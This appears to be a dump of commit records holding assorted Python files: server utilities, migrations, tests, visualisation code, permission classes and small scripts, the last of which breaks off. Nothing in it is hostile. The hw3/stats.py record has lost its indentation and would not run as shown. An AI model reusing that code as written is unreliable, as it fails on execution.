        # works on both Python 2 and Python 3 (keys() is a view in py3).
        full = next(iter(fn_))
        form = fn_[full]
        if form == 'txt':
            with open(full, 'rb') as fp_:
                ret.append({full: fp_.read()})
    return ret
def write(data, path, env='base', index=0):
    '''
    Write the named file, by default the first file found is written, but the
    index of the file can be specified to write to a lower priority file root
    '''
    # Validate env / index / path before touching the filesystem; each
    # failure returns an explanatory message instead of raising.
    if not env in __opts__['pillar_roots']:
        return 'Named environment {0} is not present'.format(env)
    if not len(__opts__['pillar_roots'][env]) > index:
        return 'Specified index {0} in environment {1} is not present'.format(
            index, env)
    if os.path.isabs(path):
        return ('The path passed in {0} is not relative to the environment '
                '{1}').format(path, env)
    dest = os.path.join(__opts__['pillar_roots'][env][index], path)
    dest_dir = os.path.dirname(dest)
    # Create intermediate directories as needed.
    if not os.path.isdir(dest_dir):
        os.makedirs(dest_dir)
    # 'w+' truncates any existing file before writing.
    with open(dest, 'w+') as fp_:
        fp_.write(data)
    return 'Wrote data to file {0}'.format(dest)
| Python | 0.000001 | |
07fd61306e645b7240883d5d468f94be5ce8a34c | Add a command to retrieve all triggers | Commands/Triggers.py | Commands/Triggers.py | from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Command(CommandInterface):
    """'triggers' command: list every registered command trigger, PM only."""
    triggers = ["triggers"]
    help = "triggers -- returns a list of all command triggers, must be over PM"
    def execute(self, Hubbot, message):
        # Only answer in private: the full trigger list is too long for a channel.
        if message.User.Name != message.ReplyTo:
            return IRCResponse(ResponseType.Say, "{} must be used over PM!".format(message.Command), message.ReplyTo)
        else:
            response = ""
            for name, command in GlobalVars.commands.iteritems():
                if len(command.triggers)>0:
                    for trigger in command.triggers:
                        # Skip parameterized triggers (containing '<').
                        # NOTE(review): the dedup is a substring test on the
                        # joined response, so a trigger that is a substring of
                        # an already-added one is suppressed -- confirm intended.
                        if "<" not in trigger and trigger not in response:
                            response += "{}, ".format(trigger)
            return IRCResponse(ResponseType.Say, response, message.ReplyTo)
b173aa1a6dc1c361d65150c6782db7618a5ff126 | Add simple indexing test. | benchmarks/simpleindex.py | benchmarks/simpleindex.py | import timeit
# This is to show that NumPy is a poorer choice than nested Python lists
# if you are writing nested for loops.
# This is slower than Numeric was but Numeric was slower than Python lists were
# in the first place.
# Compare per-element indexing cost of NumPy, Numeric and numarray against
# plain nested Python lists and a fully vectorized NumPy expression.
# Python 2 script (print statements, xrange in the timed snippets).
N = 30
# Tuple indexing with .item() to extract Python scalars (NumPy only).
code2 = r"""
for k in xrange(%d):
    for l in xrange(%d):
        res = a[k,l].item() + a[l,k].item()
""" % (N,N)
# Nested-list style double indexing a[k][l].
code3 = r"""
for k in xrange(%d):
    for l in xrange(%d):
        res = a[k][l] + a[l][k]
""" % (N,N)
# Tuple indexing a[k,l] without scalar extraction.
code = r"""
for k in xrange(%d):
    for l in xrange(%d):
        res = a[k,l] + a[l,k]
""" % (N,N)
# Setup for the pure-Python run: an N x N nested list of random floats.
setup3 = r"""
import random
a = [[None for k in xrange(%d)] for l in xrange(%d)]
for k in xrange(%d):
    for l in xrange(%d):
        a[k][l] = random.random()
""" % (N,N,N,N)
t1 = timeit.Timer(code, 'import numpy as N; a = N.rand(%d,%d)' % (N,N))
t2 = timeit.Timer(code, 'import MLab as N; a=N.rand(%d,%d)' % (N,N))
t3 = timeit.Timer(code, 'import numarray.mlab as N; a=N.rand(%d,%d)' % (N,N))
t4 = timeit.Timer(code2, 'import numpy as N; a = N.rand(%d,%d)' % (N,N))
t5 = timeit.Timer(code3, setup3)
t6 = timeit.Timer("res = a + a.transpose()","import numpy as N; a=N.rand(%d,%d)" % (N,N))
# Each timing is repeated 3 times with 100 loop executions per repeat.
print "shape = ", (N,N)
print "NumPy 1: ", t1.repeat(3,100)
print "NumPy 2: ", t4.repeat(3,100)
print "Numeric: ", t2.repeat(3,100)
print "Numarray: ", t3.repeat(3,100)
print "Python: ", t5.repeat(3,100)
print "Optimized: ", t6.repeat(3,100)
| Python | 0 | |
99061bec96a7337e6ddc1d698f00805f84089b3b | Set content headers on download | bepasty/views/download.py | bepasty/views/download.py | # Copyright: 2013 Bastian Blank <bastian@waldi.eu.org>
# License: BSD 2-clause, see LICENSE for details.
from flask import Response, current_app, stream_with_context
from flask.views import MethodView
from ..utils.name import ItemName
from . import blueprint
class DownloadView(MethodView):
    """Stream a stored item back to the client as an attachment download."""
    def get(self, name):
        n = ItemName.parse(name)
        item = current_app.storage.open(n)
        def stream():
            # Generator yielding the payload in 16 KiB chunks so the whole
            # file is never held in memory; the finally clause closes the
            # storage item even if the client disconnects mid-transfer.
            try:
                # Stream content from storage
                offset = 0
                size = item.data.size
                while offset < size:
                    buf = item.data.read(16*1024, offset)
                    offset += len(buf)
                    yield buf
            finally:
                item.close()
        ret = Response(stream_with_context(stream()))
        # NOTE(review): the stored filename is interpolated unescaped into the
        # Content-Disposition header; a filename containing '"' or newlines
        # could corrupt the header -- confirm it is sanitized on upload.
        ret.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(item.meta['filename'])
        ret.headers['Content-Length'] = item.meta['size']
        return ret
blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
| # Copyright: 2013 Bastian Blank <bastian@waldi.eu.org>
# License: BSD 2-clause, see LICENSE for details.
from flask import Response, current_app, stream_with_context
from flask.views import MethodView
from ..utils.name import ItemName
from . import blueprint
class DownloadView(MethodView):
    """Stream a stored item's raw content back to the client."""
    def get(self, name):
        n = ItemName.parse(name)
        item = current_app.storage.open(n)
        def stream():
            # Generator yielding the payload in 16 KiB chunks; the finally
            # clause closes the storage item even if the client disconnects.
            try:
                # Stream content from storage
                offset = 0
                size = item.data.size
                while offset < size:
                    buf = item.data.read(16*1024, offset)
                    offset += len(buf)
                    yield buf
            finally:
                item.close()
        return Response(stream_with_context(stream()))
blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
| Python | 0 |
5787d3ff813d2c96d0ec2c2fd90f91b93315e564 | Add stub for cliches | proselint/checks/inprogress/wgd_cliches.py | proselint/checks/inprogress/wgd_cliches.py | """WGD101: Cliches.
---
layout: post
error_code: WGD101
source: write-good
source_url: https://github.com/btford/write-good
title: WGD101: Cliches
date: 2014-06-10 12:31:19
categories: writing
---
Cliches are cliche.
"""
def check(text):
    """Flag *text* with the WGD101 'Cliche.' error.

    Stub implementation: always reports a single hit at position (1, 1)
    regardless of the input.
    """
    return [(1, 1, "WGD101", "Cliche.")]
| Python | 0.000001 | |
9068fd506811113c50886bf9c8f4094b7e1bd7a3 | Add stats.py from week 2. | hw3/stats.py | hw3/stats.py | #!/usr/bin/python
# Week 2 Problem 3. Simple statistics.
# Use Python 3 print() function, Python 3 integer division
from __future__ import print_function, division
def get_stats(input_list):
'''
Accepts a list of integers, and returns a tuple of four numbers:
minimum(int), maximum(int), mean(float), and median(float)
>>> get_stats([0, 1, 2, 3, 4])
(0, 4, 2.0, 2.0)
>>> get_stats([0, 1, 2, 3, 4, 5])
(0, 5, 2.5, 2.5)
>>> get_stats([0, 1, 2, 5])
(0, 5, 2.0, 1.5)
>>> get_stats([0, 1, 2, 4, 5])
(0, 5, 2.4, 2.0)
'''
# min() and max() are in the standard library
# you could also write
# minimum = sorted(input_list)[0]
# maximum = sorted(input_list)[-1]
minimum = min(input_list)
maximum = max(input_list)
# use the sum() function from the standard library to calculate mean
# this is equivalent to
# total = length = 0
# for i in input_list: total += i
# for i in input_list: length += 1
# mean = total / length
mean = sum(input_list) / len(input_list)
# calculate the median
# if the number of elements is even, we take the average of 2 middle numbers
# if the number of elements is odd, median is the middle element
# note that we used the Python 3 integer division // to get integer
if len(input_list) % 2:
median = input_list[(len(input_list) - 1) // 2 ]
else:
median = 0.5 * (input_list[(len(input_list) - 1) // 2] \
+ input_list[len(input_list) // 2])
# return a tuple of min, max, mean, median
return minimum, maximum, mean, median
if __name__ == '__main__':
# we will test our function with a list of integers from 0 to 50
my_list = range(0, 51)
# get_stats returns a tuple of min, max, mean, median of my_list
# print out min, max, mean, median on each line
print("Minimum: %i\nMaximum: %i\nMean: %.1f\nMedian: %.1f" % get_stats(my_list)) | Python | 0 | |
84f31dfa718a2f557b0058920037265331fd1a3f | Add missing merge migration | osf/migrations/0099_merge_20180427_1109.py | osf/migrations/0099_merge_20180427_1109.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-27 16:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Empty merge migration reconciling two divergent 0098 branches."""
    dependencies = [
        ('osf', '0098_merge_20180416_1807'),
        ('osf', '0098_auto_20180418_1722'),
    ]
    operations = [
    ]
| Python | 0.000002 | |
99d7a6dd79e0661bb047198261d624fd62e41406 | add missing file | gui/vtk/ExodusResult.py | gui/vtk/ExodusResult.py | import os, sys, PyQt4, getopt
from PyQt4 import QtCore, QtGui
import vtk
import time
class ExodusResult:
    """Wraps an ExodusII result file as VTK actors (full surface, a
    plane-clipped surface, and a scalar bar) for the given renderer."""
    def __init__(self, render_widget, renderer, plane):
        self.render_widget = render_widget
        self.renderer = renderer
        # Implicit plane function used by the clipping pipeline in setFileName().
        self.plane = plane
        # Every actor created so far, kept so callers can remove them later.
        self.current_actors = []
    def setFileName(self, file_name):
        """Read *file_name*, build the render/clip pipelines, record the
        available variables, and add the main surface actor to the renderer."""
        self.currently_has_actor = True
        self.file_name = file_name
        self.reader = vtk.vtkExodusIIReader()
        self.reader.SetFileName(self.file_name)
        self.reader.UpdateInformation()
        self.current_dim = self.reader.GetDimensionality()
        self.min_timestep = 0
        self.max_timestep = 0
        # NOTE: 'range' deliberately left as-is but it shadows the builtin.
        range = self.reader.GetTimeStepRange()
        self.min_timestep = range[0]
        self.max_timestep = range[1]
        # Enable every element-block and nodal array, then jump to the
        # last timestep in the file before reading.
        self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.ELEM_BLOCK, 1)
        self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL, 1)
        self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL_TEMPORAL, 1)
        self.reader.SetTimeStep(self.max_timestep)
        self.reader.Update()
        # Per-variable bookkeeping filled in below.
        self.current_variable_point_data = {}
        self.current_variables = []
        self.current_nodal_components = {}
        self.current_elemental_components = {}
        self.component_index = -1
        # Composite pipeline is required to handle multiblock Exodus output.
        cdp = vtk.vtkCompositeDataPipeline()
        vtk.vtkAlgorithm.SetDefaultExecutivePrototype(cdp)
        self.output = self.reader.GetOutput()
        self.geom = vtk.vtkCompositeDataGeometryFilter()
        self.geom.SetInputConnection(0,self.reader.GetOutputPort(0))
        self.geom.Update()
        # Blue-to-red lookup table for scalar coloring.
        self.lut = vtk.vtkLookupTable()
        self.lut.SetHueRange(0.667, 0.0)
        self.lut.SetNumberOfColors(256)
        self.lut.Build()
        self.data = self.geom.GetOutput()
        # Record each nodal (point) variable name and its component count.
        num_nodal_variables = self.data.GetPointData().GetNumberOfArrays()
        for var_num in xrange(num_nodal_variables):
            var_name = self.data.GetPointData().GetArrayName(var_num)
            self.current_variables.append(var_name)
            components = self.data.GetPointData().GetVectors(var_name).GetNumberOfComponents()
            self.current_nodal_components[var_name] = components
            # self.data.GetPointData().GetVectors(value_string).GetComponentName(0)
        # Same bookkeeping for elemental (cell) variables.
        num_elemental_variables = self.data.GetCellData().GetNumberOfArrays()
        for var_num in xrange(num_elemental_variables):
            var_name = self.data.GetCellData().GetArrayName(var_num)
            self.current_variables.append(var_name)
            components = self.data.GetCellData().GetVectors(var_name).GetNumberOfComponents()
            self.current_elemental_components[var_name] = components
        # Main surface actor; added to the renderer immediately.
        self.mapper = vtk.vtkPolyDataMapper()
        self.mapper.SetInput(self.data)
        self.mapper.ScalarVisibilityOn()
        self.mapper.SetLookupTable(self.lut)
        self.actor = vtk.vtkActor()
        self.current_actors.append(self.actor)
        self.actor.SetMapper(self.mapper)
        self.renderer.AddActor(self.actor)
        self.current_actor = self.actor
        # Clipped view: the same dataset cut by self.plane; its actor is
        # created and tracked but not added to the renderer here.
        self.clipper = vtk.vtkTableBasedClipDataSet()
        self.clipper.SetInput(self.output)
        self.clipper.SetClipFunction(self.plane)
        self.clipper.Update()
        self.clip_geom = vtk.vtkCompositeDataGeometryFilter()
        self.clip_geom.SetInputConnection(0,self.clipper.GetOutputPort(0))
        self.clip_geom.Update()
        self.clip_data = self.clip_geom.GetOutput()
        self.clip_mapper = vtk.vtkPolyDataMapper()
        self.clip_mapper.SetInput(self.clip_data)
        self.clip_mapper.ScalarVisibilityOn()
        self.clip_mapper.SetLookupTable(self.lut)
        self.clip_actor = vtk.vtkActor()
        self.clip_actor.SetMapper(self.clip_mapper)
        self.current_actors.append(self.clip_actor)
        # Color legend for the active lookup table.
        self.scalar_bar = vtk.vtkScalarBarActor()
        self.current_actors.append(self.scalar_bar)
        self.scalar_bar.SetLookupTable(self.mapper.GetLookupTable())
        self.scalar_bar.SetNumberOfLabels(4)
        self.current_bounds = self.actor.GetBounds()
| Python | 0.000001 | |
d6850ebe441a966dcf17f5cb8b0ce57a7c9dce8a | Add argument parsing | helenae/db/create_db.py | helenae/db/create_db.py | from optparse import OptionParser
import sqlalchemy.exc
from sqlalchemy import text
from sqlalchemy.orm import sessionmaker
from tables import *
def create_db():
"""
Defined tables at tables.py file are created in some DB
"""
try:
Base.metadata.create_all(engine)
except sqlalchemy.exc.InvalidRequestError:
print "SQLAlchemy ERROR: SQLAlchemy was asked to do something it can't do"
except sqlalchemy.exc.DBAPIError, exc:
print "SQLAlchemy ERROR: %s", (exc)
except sqlalchemy.exc.SQLAlchemyError, exc:
print "SQLAlchemy ERROR: %s", (exc)
def initialize_db():
    """
    Insert a fixed set of test rows (catalog, filespace, account type, group
    and user) into the tables defined in tables.py, then run a sample query
    against ``users`` and print the rows.
    """
    #insert test data
    Session = sessionmaker(bind=engine)
    session = Session()
    # Each insert is committed individually so later rows can reference
    # earlier ones by id.
    test_dir = Catalog('test')
    session.add(test_dir)
    session.commit()
    #test_file = File('test.txt', '123456.txt', hash('123456.txt'), 1024, 0, 1)
    #test_file.server_id.append(test_server)
    #session.add(test_file)
    #session.commit()
    test_fs = FileSpace('test')
    session.add(test_fs)
    session.commit()
    test_acctype = AccountType('free', 0.00)
    session.add(test_acctype)
    session.commit()
    test_group = Group('users', 1101)
    session.add(test_group)
    session.commit()
    # NOTE(review): hash('123456') is the builtin hash, not a password hash,
    # and is not stable across interpreter runs -- confirm intent.
    test_user = Users('relrin', 'Valery Savich', hash('123456'), 'some@mail.com', '01.01.2014', 1, 1, 1)
    session.add(test_user)
    session.commit()
    session.close()
    print "Insertion data has complete!"
    print "Test query: Getting data from [Users] table\n"
    connection = engine.connect()
    result = engine.execute(text("select name, fullname, password from users"))
    for row in result:
        print "Users<name=%s, fullname=%s, password=%s>" % (row.name, row.fullname, row.password)
if __name__ == '__main__':
    # Parse command-line flags. Fixed: the options were declared without
    # action="store_true", so they required an argument, and bool() of any
    # non-empty argument string (e.g. "-c False") was always True. Declaring
    # them as real boolean switches removes both problems.
    parser = OptionParser()
    parser.add_option("-c", "--crtdb", dest='cdb', action="store_true",
                      help="Create database", default=False)
    parser.add_option("-i", "--initdb", dest="idb", action="store_true",
                      help="Initialize DB: insert test data", default=False)
    (options, args) = parser.parse_args()
    if options.cdb:
        create_db()
    if options.idb:
        initialize_db()
| Python | 0.000035 | |
712733ead5e36362fe6e2eca1235744c257c7f69 | Create helloWorld.py | helloWorld.py | helloWorld.py | # programe in python
print("Hello World!")  # fixed: printf is not a Python builtin (NameError)
| Python | 0.999992 | |
bf56a5afed926d7cdd536c1da8ba5b021a09bd95 | Test pipe framework | skan/test/test_pipe.py | skan/test/test_pipe.py | import os
import pytest
import pandas
from skan import pipe
@pytest.fixture
def image_filename():
    """Absolute path to the bundled ``retic.tif`` sample image."""
    test_dir = os.path.abspath(os.path.dirname(__file__))
    return os.path.join(test_dir, 'data', 'retic.tif')
def test_pipe(image_filename):
    """Smoke-test the image-processing pipeline on the sample image."""
    frame = pipe.process_images(
        [image_filename], 'fei', 5e-8, 0.1, 0.075, 'Scan/PixelHeight')
    assert type(frame) == pandas.DataFrame
    assert frame.shape[0] > 0
| Python | 0 | |
b663bf77fe60a108598db4ae8310e8877d06cddd | Add unit tests for core module | tests/core_test.py | tests/core_test.py | """Test CLI module"""
import os
import sys
import tempfile
import unittest
from mock import mock_open, patch
from context import dfman
from dfman import config, const, core
class TestMainRuntime(unittest.TestCase):
    """Unit tests for ``dfman.core.MainRuntime``."""

    @patch('dfman.core.Config')
    @patch.object(dfman.core.MainRuntime, 'set_output_streams')
    def test_run_initial_setup(self, _, mock_config):
        """Config-file booleans should fill in flags not set via args."""
        mc_return = mock_config.return_value
        # dry run and verbose are set to false with args
        mc_return.getboolean.return_value = False
        runtime = dfman.core.MainRuntime(False, False)
        runtime.run_initial_setup()

        self.assertFalse(runtime.dry_run)
        self.assertFalse(runtime.verbose)

        # verbose is set to true with config file but not with args
        mc_return.getboolean.return_value = True
        runtime.run_initial_setup()

        self.assertTrue(runtime.verbose)

    def test_get_distro(self):
        """``get_distro`` should return the ``ID=`` field of os-release."""
        test_os = \
b'''
NAME="Scary Linux"
ID=spooky
PRETTY_NAME="Spooky Scary Linux"
ANSI_COLOR="1;32"
'''
        with tempfile.NamedTemporaryFile() as tmp:
            tmp.write(test_os)
            tmp.seek(0)  # seek() also flushes the write buffer to disk

            runtime = dfman.core.MainRuntime(False, False)
            # Point the module constant at our fake os-release file.
            const.SYSTEMD_DISTINFO = tmp.name
            self.assertEqual(runtime.get_distro(), 'spooky')

    def test_get_overrides(self):
        """Distro-specific override sections should win over [Overrides]."""
        test_config = \
b'''
[Overrides]
file1 = dir1/file1
file2 = dir2/file2

[spooky]
file2 = distoverride/file2
'''
        with tempfile.NamedTemporaryFile() as tmp:
            tmp.write(test_config)
            tmp.seek(0)

            # NOTE(review): this local name shadows the imported ``config``
            # module from dfman -- consider renaming.
            config = dfman.Config()
            config.cfg_file = tmp.name
            config.load_cfg()

            runtime = dfman.core.MainRuntime(False, False)
            runtime.config = config
            runtime.distro = 'spooky'

            overrides = runtime.get_overrides()

        self.assertEqual(overrides['file1'], 'dir1/file1')
        self.assertEqual(overrides['file2'], 'distoverride/file2')
if __name__ == '__main__':
    unittest.main()  # run this module's tests when executed directly
| Python | 0 | |
be59230531d98dc25f806b2290a51a0f4fde1d3b | Rename model to prevent crash during module upgrade in tests | addons/survey/migrations/8.0.2.0/pre-migration.py | addons/survey/migrations/8.0.2.0/pre-migration.py | # coding: utf-8
from openupgradelib import openupgrade
@openupgrade.migrate()
def migrate(cr, version):
    """Pre-migration: rename the legacy ``survey`` table and model to
    ``survey_survey`` / ``survey.survey`` so the module upgrade does not
    crash on the old names.
    """
    openupgrade.rename_tables(cr, [('survey', 'survey_survey')])
    openupgrade.rename_models(cr, [('survey', 'survey.survey')])
| Python | 0 | |
a277a25014c250c04fabb669013305940c867abc | Introduce new variables | openfisca_country_template/variables/stats.py | openfisca_country_template/variables/stats.py | # -*- coding: utf-8 -*-
# This file defines the variables of our legislation.
# A variable is property of a person, or an entity (e.g. a household).
# See http://openfisca.org/doc/variables.html
# Import from openfisca-core the common python objects used to code the legislation in OpenFisca
from openfisca_core.model_api import *
# Import the entities specifically defined for this tax and benefit system
from openfisca_country_template.entities import *
class total_benefits(Variable):
    column = FloatCol
    entity = Household
    definition_period = MONTH
    label = "Sum of the benefits perceived by a household"
    reference = "https://stats.gov.example/benefits"

    def formula(household, period, parameters):
        """Household benefits = summed member basic incomes + housing allowance."""
        # Per-member basic income, aggregated over the whole household.
        members_basic_income = household.members('basic_income', period)
        household_basic_income = household.sum(members_basic_income)
        housing_allowance = household('housing_allowance', period)
        return household_basic_income + housing_allowance
class total_taxes(Variable):
    column = FloatCol
    entity = Household
    definition_period = MONTH
    label = "Sum of the taxes paid by a household"
    reference = "https://stats.gov.example/taxes"

    def formula(household, period, parameters):
        """Household taxes = member income tax + member contributions + 1/12 of the yearly housing tax."""
        income_tax = household.sum(household.members('income_tax', period))
        social_security = household.sum(
            household.members('social_security_contribution', period))
        housing_tax_monthly = household('housing_tax', period.this_year) / 12
        return income_tax + social_security + housing_tax_monthly
| Python | 0.000007 | |
4af5ec8c040cc1e1eae6b6208bb7e2cfeac7e146 | Allow custom Permissions to take Requests or Divisions | evesrp/auth/__init__.py | evesrp/auth/__init__.py | import re
from collections import namedtuple
from functools import partial
from flask.ext.login import current_user
from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded
from flask.ext.wtf import Form
from wtforms.fields import SubmitField, HiddenField
from .. import app, db, login_manager, principal
class AuthForm(Form):
    """Base login form; auth methods extend it via :meth:`append_field`."""

    submit = SubmitField('Login')

    @classmethod
    def append_field(cls, name, field):
        # Attach ``field`` to the form class under ``name`` and return the
        # class so calls can be chained.
        setattr(cls, name, field)
        return cls
class AuthMethod(object):
    """Base class for pluggable authentication backends.

    Subclasses override :meth:`login` (and optionally :meth:`form`,
    :meth:`list_groups` and :meth:`register_views`).
    """

    # Human-readable backend name; also embedded in the login form.
    name = 'Base Authentication'

    def form(self):
        """Return an instance of the form to login."""
        return AuthForm.append_field('auth_method',
                HiddenField(default=self.name))

    def login(self, form):
        """Process a validated login form.

        You must return a valid response object.
        """
        pass

    def list_groups(self, user=None):
        """List the groups for ``user``. Optional hook; default is a no-op."""
        pass

    @classmethod
    def register_views(cls, app):
        """Register views (if needed).

        This is an optional method to implement.
        """
        pass
# Work around some circular imports
from .models import User, Group, Division
@login_manager.user_loader
def login_loader(userid):
    """Pull a user object from the database.

    This is used for loading users from existing sessions.

    :param userid: primary key stored in the session (string).
    :returns: the matching :class:`User`, or ``None`` if not found.
    """
    return User.query.get(int(userid))
# This can be confusing, so here goes. Needs really only need to be tuples, of
# some unspecified (but known) length. So, we create named tuples, and then to
# make creating them easier freeze the first argument using partial.
# A need is a ('method', division_id) pair; the partials freeze the method.
ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division'])
SubmitRequestsNeed = partial(ReimbursementNeed, 'submit')   # submit to a division
ReviewRequestsNeed = partial(ReimbursementNeed, 'review')   # review a division's requests
PayoutRequestsNeed = partial(ReimbursementNeed, 'pay')      # pay out a division's requests
# Now, create Permission classes for these kinds of needs.
class SubmitRequestsPermission(Permission):
    """Permission guarding submission of requests to a division.

    Accepts either a ``Division`` or a request-like object exposing a
    ``division`` attribute.
    """

    def __init__(self, div_or_request):
        # Resolve the division id regardless of which object was given.
        if isinstance(div_or_request, Division):
            division_id = div_or_request.id
        else:
            division_id = div_or_request.division.id
        super(SubmitRequestsPermission, self).__init__(
                SubmitRequestsNeed(division_id))
class ReviewRequestsPermission(Permission):
    """Permission guarding review of a division's requests.

    Accepts either a ``Division`` or a request-like object exposing a
    ``division`` attribute.
    """

    def __init__(self, div_or_request):
        # Resolve the division id regardless of which object was given.
        if isinstance(div_or_request, Division):
            division_id = div_or_request.id
        else:
            division_id = div_or_request.division.id
        super(ReviewRequestsPermission, self).__init__(
                ReviewRequestsNeed(division_id))
class PayoutRequestsPermission(Permission):
    """Permission guarding payout of a division's requests.

    Accepts either a ``Division`` or a request-like object exposing a
    ``division`` attribute.
    """

    def __init__(self, div_or_request):
        # Resolve the division id regardless of which object was given.
        if isinstance(div_or_request, Division):
            division_id = div_or_request.id
        else:
            division_id = div_or_request.division.id
        super(PayoutRequestsPermission, self).__init__(
                PayoutRequestsNeed(division_id))
@identity_loaded.connect_via(app)
def load_user_permissions(sender, identity):
    """Populate the Principal identity with the current user's needs."""
    identity.user = current_user
    if current_user.is_authenticated():
        # Set user role (see and modify their own requests)
        identity.provides.add(UserNeed(current_user.id))
        # Set division roles
        for role in ('submit', 'review', 'pay'):
            for division in current_user.divisions[role]:
                identity.provides.add(ReimbursementNeed(role, division.id))
        # If they're an admin, set that
        if current_user.admin:
            identity.provides.add(RoleNeed('admin'))
| import re
from collections import namedtuple
from functools import partial
from flask.ext.login import current_user
from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded
from flask.ext.wtf import Form
from wtforms.fields import SubmitField, HiddenField
from .. import app, db, login_manager, principal
class AuthForm(Form):
    """Base login form; auth methods extend it via :meth:`append_field`."""

    submit = SubmitField('Login')

    @classmethod
    def append_field(cls, name, field):
        # Attach ``field`` to the form class under ``name`` and return the
        # class so calls can be chained.
        setattr(cls, name, field)
        return cls
class AuthMethod(object):
    """Base class for pluggable authentication backends.

    Subclasses override :meth:`login` (and optionally :meth:`form`,
    :meth:`list_groups` and :meth:`register_views`).
    """

    # Human-readable backend name; also embedded in the login form.
    name = 'Base Authentication'

    def form(self):
        """Return an instance of the form to login."""
        return AuthForm.append_field('auth_method',
                HiddenField(default=self.name))

    def login(self, form):
        """Process a validated login form.

        You must return a valid response object.
        """
        pass

    def list_groups(self, user=None):
        """List the groups for ``user``. Optional hook; default is a no-op."""
        pass

    @classmethod
    def register_views(cls, app):
        """Register views (if needed).

        This is an optional method to implement.
        """
        pass
# Work around some circular imports
from .models import User, Group, Division
@login_manager.user_loader
def login_loader(userid):
    """Pull a user object from the database.

    This is used for loading users from existing sessions.

    :param userid: primary key stored in the session (string).
    :returns: the matching :class:`User`, or ``None`` if not found.
    """
    return User.query.get(int(userid))
# This can be confusing, so here goes. Needs really only need to be tuples, of
# some unspecified (but known) length. So, we create named tuples, and then to
# make creating them easier freeze the first argument using partial.
ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division'])
SubmitRequestsNeed = partial(ReimbursementNeed, 'submit')
ReviewRequestsNeed = partial(ReimbursementNeed, 'review')
PayoutRequestsNeed = partial(ReimbursementNeed, 'pay')
# Now, create Permission classes for these kinds of needs.
class SubmitRequestsPermission(Permission):
    """Permission for submitting requests to ``division``."""

    def __init__(self, division):
        # Build the need inline and hand it straight to Permission.
        super(SubmitRequestsPermission, self).__init__(
                SubmitRequestsNeed(division.id))
class ReviewRequestsPermission(Permission):
    """Permission for reviewing requests of ``division``."""

    def __init__(self, division):
        # Build the need inline and hand it straight to Permission.
        super(ReviewRequestsPermission, self).__init__(
                ReviewRequestsNeed(division.id))
class PayoutRequestsPermission(Permission):
    """Permission for paying out requests of ``division``."""

    def __init__(self, division):
        # Build the need inline and hand it straight to Permission.
        super(PayoutRequestsPermission, self).__init__(
                PayoutRequestsNeed(division.id))
@identity_loaded.connect_via(app)
def load_user_permissions(sender, identity):
    """Populate the Principal identity with the current user's needs."""
    identity.user = current_user
    if current_user.is_authenticated():
        # Set user role (see and modify their own requests)
        identity.provides.add(UserNeed(current_user.id))
        # Set division roles
        for role in ('submit', 'review', 'pay'):
            for division in current_user.divisions[role]:
                identity.provides.add(ReimbursementNeed(role, division.id))
        # If they're an admin, set that
        if current_user.admin:
            identity.provides.add(RoleNeed('admin'))
| Python | 0 |
becba80983c5f0f29f981eadcc79d4f496e1d28b | fix issue #2778 | theme/management/commands/fix_user_quota_model.py | theme/management/commands/fix_user_quota_model.py | from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from theme.models import UserQuota
class Command(BaseCommand):
    help = "This command can be run to fix the corrupt user data where some users do not " \
           "have UserQuota foreign key relation. This management command can be run on " \
           "an as-needed basis."

    def handle(self, *args, **options):
        """Create a default UserQuota for every active, non-superuser account
        that is missing one in the internal zone."""
        users = User.objects.filter(is_active=True).filter(is_superuser=False).all()
        hs_internal_zone = "hydroshare"
        for u in users:
            uq = UserQuota.objects.filter(user__username=u.username, zone=hs_internal_zone).first()
            if not uq:
                # create default UserQuota object for this user.
                # Fixed: objects.create() already persists the row; the
                # extra save() in the original issued a redundant UPDATE.
                UserQuota.objects.create(user=u)
| Python | 0 | |
4f1cda8459cb6bca2e317bb582266fb43e78215c | Add test_manager_mixin module. | linguist/tests/test_manager_mixin.py | linguist/tests/test_manager_mixin.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .base import BaseTestCase
from ..models import Translation
from ..utils.i18n import get_cache_key
class ManagerMixinTest(BaseTestCase):
    """
    Tests the Linguist's manager mixin.
    """

    def setUp(self):
        # Register the models/translations that every test below relies on.
        self.create_registry()

    def test_set_instance_cache(self):
        """set_instance_cache should cache every supplied translation."""
        from ..mixins import set_instance_cache
        translations = [self.translation_en, self.translation_fr]
        set_instance_cache(self.instance, translations)
        self.assertEqual(
            self.instance.cached_translations_count,
            Translation.objects.count())

    def test_get_translation_lookups(self):
        """get_translation_lookups should build ORM filter kwargs, narrowing
        by fields and languages when given."""
        from ..mixins import get_translation_lookups

        lookups = get_translation_lookups(self.instance)
        self.assertEqual(lookups, {
            'identifier': self.instance.identifier,
            'object_id': self.instance.pk,
        })

        lookups = get_translation_lookups(self.instance, fields=['title', 'body'])
        self.assertEqual(lookups, {
            'identifier': self.instance.identifier,
            'object_id': self.instance.pk,
            'field_name__in': ['title', 'body'],
        })

        lookups = get_translation_lookups(self.instance, fields=['title'], languages=['en', 'fr'])
        self.assertEqual(lookups, {
            'identifier': self.instance.identifier,
            'object_id': self.instance.pk,
            'field_name__in': ['title'],
            'language__in': ['en', 'fr'],
        })
| Python | 0 | |
326249502d9884ea5717afff63b8a7caf60f6c2c | check in openstack healthcheck tool | planetstack/tools/openstack-healthcheck.py | planetstack/tools/openstack-healthcheck.py | #! /usr/bin/python
import os
import sys
import subprocess
import time
def get_systemd_status(service):
    """Return the (stripped) stdout of ``systemctl is-active <service>``."""
    proc = subprocess.Popen(["/bin/systemctl", "is-active", service],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout_data, _ = proc.communicate()
    return stdout_data.strip()
# Whether each service is enabled (``systemctl is-enabled`` exits 0 if so).
